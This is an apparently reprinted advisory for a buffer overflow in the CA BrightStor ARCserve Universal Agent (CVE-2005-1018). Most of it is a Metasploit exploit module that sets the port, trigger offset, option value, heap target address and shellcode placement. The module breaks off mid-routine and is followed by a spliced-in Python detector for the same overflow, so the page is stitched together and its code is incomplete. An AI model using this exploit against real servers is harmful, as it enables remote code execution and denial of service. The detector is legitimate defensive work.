CA BrightStor ARCserve Backup UniversalAgent…
2008-04-09 04:21:25 Source: Internet
Published: 2005-04-12
Updated: 2005-04-12
Affected systems:
Computer Associates BrightStor ARCserve Backup v11 (Win32)
Description:
BUGTRAQ ID: 13102
CVE(CAN) ID: CVE-2005-1018
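BrightStor ARCserve Backup provides backup and restore protection for all levels of Windows, NetWare, Linux and UNIX servers and for Windows, Mac OS X, Linux, UNIX, AS/400 and VMS client environments.
The BrightStor software implementation contains a buffer overflow vulnerability that a remote attacker could exploit to execute arbitrary commands on the host.
BrightStor uses network agents to perform backups on nodes across the network. If an agent request is received on the TCP port with its option field set to 0, 3 or 1000, and the packet contains a very large string before that option field, an overflow occurs. A remote attacker could exploit this vulnerability to execute arbitrary commands on the vulnerable computer or to cause a denial of service.
<*Source: iDEFENSE Labs (labs@idefense.com)
Link: *>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!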
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::cabrightstor_uniagent;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'CA BrightStor Universal Agent Overflow',
'Version' => '$Revision: 1.13 $',
'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003', 'winnt' ],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 6050],
},
'Payload' =>
{
# 250 bytes of space (bytes 0xa5 -> 0xa8 = reversed)
'Space' => 164,
'BadChars' => "\x00",
'Keys' => [' ws2ord'],
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a convoluted heap overflow in the CA
BrightStor Universal Agent service. Triple userland exception
results in heap growth and execution of dereferenced function pointer
at a specified address.
}),
'Refs' =>
[
['OSVDB', '15471'],
['MIL', '16'],
['URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],
],
'DefaultTarget' => 0,
'Targets' => [
['Magic Heap Target #1', 0x01625c44], # far away heap address
],
'Keys' => ['brightstor'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
# The server reverses four bytes starting at 0xa5
# my $patchy = join('', reverse(split('',substr($shellcode, 0xa5, 4))));
# substr($shellcode, 0xa5, 4, $patchy);
# Create the request
my $boom = "X" x 1024;
# Required field to trigger the fault
substr($boom, 248, 2, pack('v', 1000));
# The shellcode, limited to 250 bytes (no nulls)
substr($boom, 256, length($shellcode), $shellcode);
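A defensive check for the condition the advisory describes, as an added example that is not part of the original advisory or of the Metasploit module: it flags payloads sent to the agent port whose 16-bit option field is 0, 3 or 1000 and is preceded by an unterminated string. The port (6050) and field offset (248, little-endian) are taken from the module above; the rule that legitimate requests NUL-terminate the preceding string is an assumption, and all sample segments and addresses are constructed.

```python
import struct

AGENT_PORT = 6050               # RPORT default in the module on this page
OPTION_OFFSET = 248             # where the module writes pack('v', 1000)
TRIGGER_OPTIONS = {0, 3, 1000}  # option values named in the advisory


def suspicious_agent_request(dst_port: int, payload: bytes) -> bool:
    """Return True if a TCP payload matches the advisory's overflow condition."""
    if dst_port != AGENT_PORT or len(payload) < OPTION_OFFSET + 2:
        return False
    (option,) = struct.unpack_from("<H", payload, OPTION_OFFSET)
    if option not in TRIGGER_OPTIONS:
        return False
    # Assumption: a well-formed request NUL-terminates the string that
    # precedes the option field. A region with no NUL at all is treated
    # as the "very large string" the advisory describes.
    return b"\x00" not in payload[:OPTION_OFFSET]


def flagged_sources(segments):
    """Return source addresses (in first-seen order) that sent a flagged payload."""
    seen = []
    for src, dst_port, payload in segments:
        if suspicious_agent_request(dst_port, payload) and src not in seen:
            seen.append(src)
    return seen


# Constructed sample payloads (not captured traffic).
BENIGN = b"backuphost".ljust(OPTION_OFFSET, b"\x00") + struct.pack("<H", 3) + b"\x00" * 6
OVERFLOW = b"A" * OPTION_OFFSET + struct.pack("<H", 1000) + b"A" * 774
OTHER_OPTION = b"A" * OPTION_OFFSET + struct.pack("<H", 7) + b"A" * 16

# Constructed (source, destination port, payload) tuples; addresses are
# from the documentation range 192.0.2.0/24.
SAMPLE_SEGMENTS = [
    ("192.0.2.10", 6050, BENIGN),
    ("192.0.2.66", 6050, OVERFLOW),
    ("192.0.2.66", 6050, OVERFLOW),
    ("192.0.2.20", 80, OVERFLOW),        # wrong port, ignored
    ("192.0.2.30", 6050, OTHER_OPTION),  # option not in the trigger set
    ("192.0.2.40", 6050, b"A" * 100),    # too short to hold the option field
]

if __name__ == "__main__":
    for addr in flagged_sources(SAMPLE_SEGMENTS):
        print("possible UniversalAgent overflow attempt from", addr)
```

The check inspects a single payload, so a sensor using it needs reassembled TCP stream data rather than individual fragments.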